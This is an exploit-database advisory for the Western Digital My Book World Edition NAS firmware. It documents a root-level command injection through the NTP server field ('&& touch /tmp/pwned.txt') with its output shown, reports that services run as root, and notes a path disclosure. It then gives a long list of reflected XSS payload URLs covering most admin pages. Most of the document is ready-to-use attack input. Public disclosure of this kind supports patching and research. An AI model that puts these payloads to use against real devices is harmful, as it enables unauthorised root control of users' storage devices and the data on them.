My Book World Edition NAS - Multiple Vulnerabilities

EDB-ID:

10792

CVE:



Author:

emgent

Type:

webapps


Platform:

Hardware

Date:

2009-12-30


# Exploit Title: My Book World Edition NAS multiple vulnerability
# Date: 20091230
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20091230-NAS.txt
# Version: 01.01.16 with MioNet 2.3.9.13 firmware.
# CVE : N/A
# Vendor: http://www.wdc.com/mybookworld

[+] REMOTE COMMAND EXECUTION

Pages:
http://10.12.6.111/admin/e_datetime.php?lang=en
http://10.12.6.111/admin/system_general.php?lang=en

Box entry:
NTP TIME SERVER: "pool.ntp.org && touch /tmp/pwned.txt"

Output:
~ # ls -la /tmp/ |grep pwned
-rw-rw-rw-    1 root     root            0 Dec 30 08:25 pwned.txt
~ #


[+] WEB SERVER DEFAULT SECURITY MISSCONFIGURATION

All services and web applications run with root privileges, so exploiting
web apps is possible run command with uid 0 privileges.


[+] INFORMATION DISCLOSURE

Browsing http://10.12.6.111/help/express.php?lang=en%22 is possible see the real path
in the system, via xml error not blocked.


[+] CROSS SITE SCRIPTING (XSS)

A lot of XSS attacks are possible in this web application, all "?lang=" var are vulnerable.

http://10.12.6.111/admin/basic_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_config_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_alerts.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_automated.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_manual.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_general.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_advanced.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_generate_ssl_form.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_lan.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_service.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_workgroup_domain.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_disk_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_volume_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_usb_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_quota_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_download_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_change_btadmin_passwd.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/media_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/itune_server_properties.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_edit.php?id=1&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_system.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_cifs.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_ftp.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_setting.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_machine.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_datetime.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_network.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_change_passwd.php?id=2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?act=del&id=user&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_mionet.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/basic_index.php?action=logout&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/help/system.php?lang=en"><script>alert('XSS');</script>&page=system_summary
and more other...